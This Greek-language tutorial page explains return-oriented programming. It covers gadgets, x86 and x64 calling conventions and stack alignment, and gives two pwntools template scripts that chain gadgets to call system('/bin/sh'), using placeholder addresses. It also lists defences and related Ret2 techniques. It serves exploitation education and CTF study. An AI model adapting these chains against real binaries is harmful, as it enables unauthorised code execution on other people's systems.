ROP - Return Oriented Programing

Βασικές Πληροφορίες

Η Προγραμματισμένη Επιστροφή (ROP) είναι μια προηγμένη τεχνική εκμετάλλευσης που χρησιμοποιείται για να παρακάμψει μέτρα ασφαλείας όπως το No-Execute (NX) ή το Data Execution Prevention (DEP). Αντί να εισάγει και να εκτελεί κώδικα κέλυφους, ένας επιτιθέμενος εκμεταλλεύεται κομμάτια κώδικα που υπάρχουν ήδη στο δυαδικό αρχείο ή σε φορτωμένες βιβλιοθήκες, γνωστά ως "gadgets". Κάθε gadget τελειώνει συνήθως με μια εντολή ret και εκτελεί μια μικρή λειτουργία, όπως μεταφορά δεδομένων μεταξύ καταχωρητών ή εκτέλεση αριθμητικών πράξεων. Συνδέοντας αυτά τα gadgets μαζί, ένας επιτιθέμενος μπορεί να κατασκευάσει ένα φορτίο για να εκτελέσει αυθαίρετες λειτουργίες, παρακάμπτοντας αποτελεσματικά τις προστασίες NX/DEP.

Πώς Λειτουργεί το ROP

1. Απάτηση Ροής Ελέγχου: Αρχικά, ένας επιτιθέμενος πρέπει να απατήσει τη ροή ελέγχου ενός προγράμματος, συνήθως εκμεταλλευόμενος ένα υπερχείλισμα buffer για να αντικαταστήσει μια αποθηκευμένη διεύθυνση επιστροφής στη στοίβα.

2. Αλυσίδωση Gadgets: Έπειτα, ο επιτιθέμενος επιλέγει προσεκτικά και αλυσίδωνει gadgets για να εκτελέσει τις επιθυμητές ενέργειες. Αυτό θα μπορούσε να περιλαμβάνει την ρύθμιση οργάνων για μια κλήση συνάρτησης, την κλήση της συνάρτησης (π.χ., system("/bin/sh")), και τη χειρισμό οποιασδήποτε απαραίτητης καθαριότητας ή επιπλέον λειτουργιών.

3. Εκτέλεση Φορτίου: Όταν η ευάλωτη συνάρτηση επιστρέφει, αντί να επιστρέψει σε μια νόμιμη τοποθεσία, αρχίζει να εκτελεί την αλυσίδα των gadgets.

Εργαλεία

Συνήθως, τα gadgets μπορούν να βρεθούν χρησιμοποιώντας το ROPgadget, το ropper ή απευθείας από τα pwntools (ROP).

ROP Chain σε Παράδειγμα x86

Σύμβαση Κλήσης x86 (32-bit)

• cdecl: Ο καλούντας καθαρίζει τη στοίβα. Τα ορίσματα συνάρτησης προωθούνται στη στοίβα με αντίστροφη σειρά (δεξιά προς αριστερά). Τα ορίσματα προωθούνται στη στοίβα από δεξιά προς αριστερά.

• stdcall: Παρόμοιο με το cdecl, αλλά ο καλούμενος είναι υπεύθυνος για τον καθαρισμό της στοίβας.

Εύρεση Gadgets

Αρχικά, ας υποθέσουμε ότι έχουμε εντοπίσει τα απαραίτητα gadgets μέσα στο δυαδικό αρχείο ή στις φορτωμένες βιβλιοθήκες. Τα gadgets που μας ενδιαφέρουν είναι:

• pop eax; ret: Αυτό το gadget αποσπά την κορυφαία τιμή της στοίβας στον καταχωρητή EAX και στη συνέχεια επιστρέφει, επιτρέποντάς μας να ελέγξουμε το EAX.

• pop ebx; ret: Παρόμοιο με το παραπάνω, αλλά για τον καταχωρητή EBX, επιτρέποντας τον έλεγχο του EBX.

• mov [ebx], eax; ret: Μεταφέρει την τιμή στο EAX στη θέση μνήμης που δείχνει ο EBX και στη συνέχεια επιστρέφει. Αυτό ονομάζεται συχνά gadget γραφής-τι-πού.

• Επιπλέον, έχουμε διαθέσιμη τη διεύθυνση της συνάρτησης system().

ROP Chain

Χρησιμοποιώντας τα pwntools, προετοιμάζουμε τη στοίβα για την εκτέλεση της αλυσίδας ROP ως εξής με στόχο την εκτέλεση της system('/bin/sh'), παρατηρήστε πως η αλυσίδα ξεκινά με:

1. Μια εντολή ret για λόγους ευθυγράμμισης (προαιρετικά)

2. Διεύθυνση της συνάρτησης system (υποθέτοντας απενεργοποιημένο το ASLR και γνωστή την libc, περισσότερες πληροφορίες στο Ret2lib)

3. Θέση κράτησης για τη διεύθυνση επιστροφής από την system()

4. Διεύθυνση της συμβολοσειράς "/bin/sh" (παράμετρος για τη συνάρτηση system)

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadc0de

# A gadget to control the return address, typically found through analysis
ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control the return address

# Construct the ROP chain
rop_chain = [
ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
system_addr,   # Address of system(). Execution will continue here after the ret gadget
0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
]

# Flatten the rop_chain for use
rop_chain = b''.join(p32(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

Παράδειγμα ROP Chain σε x64

Σύμβαση κλήσης x64 (64-bit)

• Χρησιμοποιεί τη σύμβαση κλήσης System V AMD64 ABI σε συστήματα παρόμοια με Unix, όπου οι πρώτες έξι ακέραιες ή δείκτες παραμέτρων περνιούνται στους registres RDI, RSI, RDX, RCX, R8, και R9. Επιπλέον παράμετροι περνιούνται στη στοίβα. Η τιμή επιστροφής τοποθετείται στο RAX.

• Η σύμβαση κλήσης Windows x64 χρησιμοποιεί τους RCX, RDX, R8, και R9 για τις πρώτες τέσσερις ακέραιες ή δείκτες παραμέτρων, με επιπλέον παραμέτρους που περνιούνται στη στοίβα. Η τιμή επιστροφής τοποθετείται στο RAX.

• Καταχωρητές: Οι 64-bit καταχωρητές περιλαμβάνουν τους RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, και R8 έως R15.

Εύρεση Gadgets

Για τον σκοπό μας, ας επικεντρωθούμε σε gadgets που θα μας επιτρέψουν να ορίσουμε τον καταχωρητή RDI (για να περάσουμε το string "/bin/sh" ως όρισμα στη συνάρτηση system()) και στη συνέχεια να καλέσουμε τη συνάρτηση system(). Θα υποθέσουμε ότι έχουμε εντοπίσει τα ακόλουθα gadgets:

• pop rdi; ret: Αποσυσκευάζει την κορυφαία τιμή της στοίβας στο RDI και στη συνέχεια επιστρέφει. Απαραίτητο για την ορισμό του ορίσματός μας για το system().

• ret: Μια απλή επιστροφή, χρήσιμη για την ευθυγράμμιση της στοίβας σε ορισμένα σενάρια.

Και γνωρίζουμε τη διεύθυνση της συνάρτησης system().

ROP Chain

Παρακάτω υπάρχει ένα παράδειγμα χρησιμοποιώντας το pwntools για να δημιουργήσουμε και να εκτελέσουμε μια ROP chain με στόχο την εκτέλεση της system('/bin/sh') σε x64:

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadbeefdeadbeef

# Gadgets (hypothetical values)
pop_rdi_gadget = 0xcafebabecafebabe  # pop rdi; ret
ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary

# Construct the ROP chain
rop_chain = [
ret_gadget,        # Alignment gadget, if needed
pop_rdi_gadget,    # pop rdi; ret
bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
system_addr        # Address of system(). Execution will continue here.
]

# Flatten the rop_chain for use
rop_chain = b''.join(p64(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

Ευθυγράμμιση Στοίβας

Η x86-64 ABI εξασφαλίζει ότι η στοίβα είναι ευθυγραμμισμένη σε 16 bytes όταν εκτελείται μια εντολή κλήσης. Το LIBC, για βελτιστοποίηση της απόδοσης, χρησιμοποιεί εντολές SSE (όπως movaps) που απαιτούν αυτό το ευθυγράμμισμα. Αν η στοίβα δεν είναι ευθυγραμμισμένη σωστά (δηλαδή το RSP δεν είναι πολλαπλάσιο του 16), κλήσεις σε συναρτήσεις όπως το system θα αποτύχουν σε μια ROP αλυσίδα. Για να διορθώσετε αυτό, απλά προσθέστε ένα ret gadget πριν καλέσετε το system στην ROP αλυσίδα σας.

Κύρια Διαφορά μεταξύ x86 και x64

ROP αλυσίδα σε Παράδειγμα ARM64

Βασικά ARM64 & Συμβάσεις Κλήσης

Ελέγξτε την παρακάτω σελίδα για αυτές τις πληροφορίες:

Προστασίες Ενάντια στο ROP

• ASLR & PIE: Αυτές οι προστασίες κάνουν πιο δύσκολη τη χρήση του ROP καθώς οι διευθύνσεις των gadgets αλλάζουν μεταξύ των εκτελέσεων.

• Stack Canaries: Σε περίπτωση Buffer Overflow, είναι απαραίτητο να παρακάμψετε το stack canary για να αντικαταστήσετε τους δείκτες επιστροφής για να καταχραστείτε μια ROP αλυσίδα.

• Έλλειψη Gadgets: Αν δεν υπάρχουν αρκετά gadgets, δεν θα είναι δυνατή η δημιουργία μιας ROP αλυσίδας.

Τεχνικές βασισμένες σε ROP

Σημειώστε ότι το ROP είναι απλά μια τεχνική για την εκτέλεση αυθαίρετου κώδικα. Βασισμένες στο ROP αναπτύχθηκαν πολλές τεχνικές Ret2XXX:

• Ret2lib: Χρησιμοποιήστε το ROP για να καλέσετε αυθαίρετες συναρτήσεις από μια φορτωμένη βιβλιοθήκη με αυθαίρετες παραμέτρους (συνήθως κάτι σαν system('/bin/sh').

• Ret2Syscall: Χρησιμοποιήστε το ROP για να προετοιμάσετε μια κλήση σε ένα σύστημα κλήσης, π.χ. execve, και να το κάνετε να εκτελέσει αυθαίρετες εντολές.

• EBP2Ret & EBP Chaining: Το πρώτο θα καταχραστεί το EBP αντί του EIP για να ελέγξει τη ροή και το δεύτερο είναι παρόμοιο με το Ret2lib αλλά σε αυτή την περίπτωση η ροή ελέγχεται κυρίως με διευθύνσεις EBP (αν και είναι απαραίτητο να ελέγχετε και το EIP).

Άλλα Παραδείγματα & Αναφορές

• https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions

• https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html

• 64 bit, Pie και nx ενεργοποιημένα, χωρίς canary, αντικατάσταση RIP με μια διεύθυνση vsyscall με σκοπό την επιστροφή στην επόμενη διεύθυνση στη στοίβα που θα είναι μια μερική αντικατάσταση της διεύθυνσης για να λάβετε το τμήμα της συνάρτησης που διαρρέει τη σημαία

• https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/

• arm64, χωρίς ASLR, ROP gadget για να κάνει τη στοίβα εκτελέσιμη και να μεταβεί σε κώδικα κέλυφους στη στοίβα